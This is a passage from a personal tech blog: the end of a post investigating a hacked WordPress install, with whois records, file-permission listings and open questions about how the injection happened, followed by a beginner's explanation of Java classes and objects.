#Filtered route: 78.159.96.0/19 descr: ORG-nA8-RIPE origin: AS28753 org: ORG-nA8-RIPE mnt-lower: NETDIRECT-MNT mnt-routes: NETDIRECT-MNT mnt-by: NETDIRECT-MNT source: RIPE #Filtered organisation: ORG-nA8-RIPE org-name: netdirect org-type: LIR address: netdirekt e. K. Kleyer Strasse 79 / Tor 14 60326 Frankfurt Germany phone: +49 69 90556880 fax-no: +49 69 905568822 admin-c: SR614-RIPE admin-c: WW200-RIPE mnt-ref: NETDIRECT-MNT mnt-ref: RIPE-NCC-HM-MNT mnt-by: RIPE-NCC-HM-MNT source: RIPE #Filtered Permissions Permissions are important, and here is where it gets confusion, I am not sure If it was I that left the permissions on this specific account so open (757) or if someone else logged in and did it, or if there was some WordPress vulnerability that was able to do this, but the permissions on all the files were different than my safe and unaffected installs. I am assuming that there is some vulnerability in WordPress that allows a user to write to these directories if the permissions are set in such a way, but I have no evidence or lead as to what it was that did it. Notice in the examples below that the dirty folder structure has wp-settings.php modified sometime in September, but other wp- files modified around the same day of installation, this was not me, as I modifying it to fix it on the 13th. Example Clean Folder Structure rw-r–r– 1 root root 561 Jun 2 13:53 .htaccess -rw-r–r– 1 root root 397 Sep 15 15:16 index.php -rw-r–r– 1 root root 16899 Sep 15 15:17 license.txt -rw-r–r– 1 root root 9202 Sep 15 15:16 readme.html -rw-r–r– 1 root root 4343 Sep 15 15:16 wp-activate.php drwxr-xrwx 9 root root 4096 Sep 15 15:17 wp-admin -rw-r–r– 1 root root 40243 Sep 15 15:16 wp-app.php -rw-r–r– 1 root root 226 Sep 15 15:16 wp-atom.php -rw-r–r– 1 root root 274 Sep 15 15:16 wp-blog-header.php -rw-r–r– 1 root root 3931 Sep 15 15:16 wp-comments-post.php -rw-r–r– 1 root root 244 Sep 15 15:16 wp-commentsrss2.php -rwxr-xrwx 1 root root 3471 Sep 19 10:04 wp-config.php -rw-r–r– 1 root root 3177 Sep 15 15:16 wp-config-sample.php drwxr-xrwx 8 root root 4096 Sep 19 10:04 wp-content -rw-r–r– 1 root root 1255 Sep 15 15:16 wp-cron.php -rw-r–r– 1 root root 246 Sep 15 15:16 wp-feed.php drwxr-xrwx 8 root root 4096 Sep 15 15:17 wp-includes -rw-r–r– 1 root root 1997 Sep 15 15:16 wp-links-opml.php -rw-r–r– 1 root root 2525 Sep 15 15:16 wp-load.php -rw-r–r– 1 root root 27601 Sep 15 15:16 wp-login.php -rw-r–r– 1 root root 7774 Sep 15 15:16 wp-mail.php -rw-r–r– 1 root root 494 Sep 15 15:16 wp-pass.php -rw-r–r– 1 root root 224 Sep 15 15:17 wp-rdf.php -rw-r–r– 1 root root 334 Sep 15 15:17 wp-register.php -rw-r–r– 1 root root 226 Sep 15 15:16 wp-rss2.php -rw-r–r– 1 root root 224 Sep 15 15:16 wp-rss.php -rw-r–r– 1 root root 9839 Sep 15 15:17 wp-settings.php -rw-r–r– 1 root root 18646 Sep 15 15:17 wp-signup.php -rw-r–r– 1 root root 3702 Sep 15 15:17 wp-trackback.php -rw-r–r– 1 root root 3266 Sep 15 15:16 xmlrpc.php Example Dirty Folder Structure drwxr-xr-x 5 root root 4096 Sep 29 23:05 . drwxr-xr-x 3 root root 4096 Oct 10 17:42 .. -rwxr-xr-x 1 root root 200 Aug 25 17:29 .htaccess -rwxr-xrwx 1 root root 397 May 25 2008 index.php -rwxr-xrwx 1 root root 16899 Jun 8 13:18 license.txt -rwxr-xrwx 1 root root 9202 Jul 12 13:24 readme.html -rwxr-xrwx 1 root root 4343 May 6 22:26 wp-activate.php drwxr-xrwx 9 root root 4096 Jul 12 14:24 wp-admin -rwxr-xrwx 1 root root 40243 Jun 1 17:03 wp-app.php -rwxr-xrwx 1 root root 226 Dec 9 2010 wp-atom.php -rwxr-xrwx 1 root root 274 Nov 20 2010 wp-blog-header.php -rwxr-xrwx 1 root root 3931 Dec 9 2010 wp-comments-post.php -rwxr-xrwx 1 root root 244 Dec 9 2010 wp-commentsrss2.php -rwxr-xrwx 1 root root 3166 Aug 24 19:21 wp-config.php drwxr-xrwx 6 root root 4096 Oct 12 19:21 wp-content -rwxr-xrwx 1 root root 1255 Mar 16 2010 wp-cron.php -rwxr-xrwx 1 root root 246 Dec 9 2010 wp-feed.php drwxr-xrwx 8 root root 4096 Sep 30 01:35 wp-includes -rwxr-xrwx 1 root root 1997 Oct 23 2010 wp-links-opml.php -rwxr-xrwx 1 root root 2525 Jun 29 11:50 wp-load.php -rwxr-xrwx 1 root root 27601 Jun 22 14:45 wp-login.php -rwxr-xrwx 1 root root 7774 May 25 2010 wp-mail.php -rwxr-xrwx 1 root root 494 Dec 9 2010 wp-pass.php -rwxr-xrwx 1 root root 224 Dec 9 2010 wp-rdf.php -rwxr-xrwx 1 root root 334 Dec 9 2010 wp-register.php -rwxr-xrwx 1 root root 226 Dec 9 2010 wp-rss2.php -rwxr-xrwx 1 root root 224 Dec 9 2010 wp-rss.php -rwxr-xrwx 1 root root 10969 Sep 12 05:39 wp-settings.php -rwxr-xrwx 1 root root 18646 May 22 17:30 wp-signup.php -rwxr-xrwx 1 root root 3702 Feb 24 2010 wp-trackback.php -rwxr-xrwx 1 root root 3266 Apr 17 03:35 xmlrpc.php The Questions How did it get in? I have no idea. My permissions were set way too losely on this site, I believe they were set to 757 whereas all my others are 755 or less. This gives public access to write to the server. Still…what did they use to access and write to the server? There was only one username, my box has no other user accounts on it, and FTP is disabled, I only use SSH and SFTP. It is puzzling, any insights or suggestions are appreciated. Who are these Russians / Germans that are hosting these sites? What are they trying to pull? I would love to recreate the injection on my own on a clean box and browser to see what javascript and data it pulls from the other sites, I’d have to install something to sniff out the data coming between the injected iFrame and javascript and the site, but thats for another day when I actually have time! My next step should probably be to e-mail these people, or give them a ring, see if they even know this is happening through their servers. I hope this article has been helpful, I look forward to further analysis in comments!

Oct 10, 2011
Java
0

tl;dr (too long; didn’t read) – Java uses classes which declare variables that store information and are modified/retrieved by methods once an object of that class is instantiated. The next post will contain code complimenting these concepts. // Continue if you want to read more. /* Java is an object-oriented programming language, but just what is an object? To find out, we must first delve into the concept of classes. Classes are “templates” of objects. These “templates” dictate all the variables, or “data,” and methods, which are essentially “actions,” that the still unknown object will have. The class will have a name, along with variables and methods. The only time you may see these names is when you are instantiating an object from the class or calling (“executing”) a method of an object, which can only be done because of the code in its originating class. To instantiate means “to create an instance of,” which, if used in real-world context (although awkward), would be akin to saying “make me one of those, and make it just like the others.” Wait, I know I might have lost you by this point, but you needed to understand what variables, methods, and classes were before an object made any sense. We know a class is a template, right? Well, consider that you can instantiate multiple objects based on this class. What this means is that they are absolutely identical in every way except for maybe their data and name, which we normally call a “reference” (because it’s actually referring to a location in memory, a hexadecimal number that would glaze your eyes over!). If a metaphor would help, they’re all identical twins that know different things, but can do the same actions! So, even though you declare variables and methods in a class, when a variable is modified or a method is run they are not affecting the class but the object that was instantiated! Now it makes sense suddenly, doesn’t it? But wait! How does this “instantiation” thing work you ask? Good question, through a type of method (yes, these are methods) called constructors! What they do is (hold onto your hats because I’m using the next word in a different sense) instantiate the variables of an object so that the object knows what data is has in case it has to do something. Now wait, we just instantiated the object, why instantiate the variables; moreover, what’s the difference? The answer is we haven’t instantiated the object yet, we need to set values to the variables so that the object has data. Only then should the object be considered instantiated! So now we know what an object is: an instance of a class that has variables and methods dictated by the class. You might be wondering about methods at this point. Methods have, traditionally, two types: accessors, and mutators. What’s an Accessor? Well, quite simply, it accesses and returns (“gives back”) data stored in the object. Nothing too special, right? Mutators, on the other hand, can do all sorts of creative things but normally modify the data of an object in some way. You won’t always get data back from these, nor will they always tell you whether they successfully executed, but their purpose is clear: when something gets changed, this is the type of method it becomes. Something to note is that this is simply a naming convention, not a requirement. You can call them “Destroyer” methods and nobody can really say anything about it, as the compiler will not complain and your code will still run. Despite this, I encourage you to think of others who may read your code, and to try your best to keep to a standard and/or convention! The next post will actually involve some code examples of all these concepts, which will be linked here upon creation. If you’re still having trouble, don’t fret, keep reading up on the concepts as much as you can and, if necessary, ask for metaphors or similes! */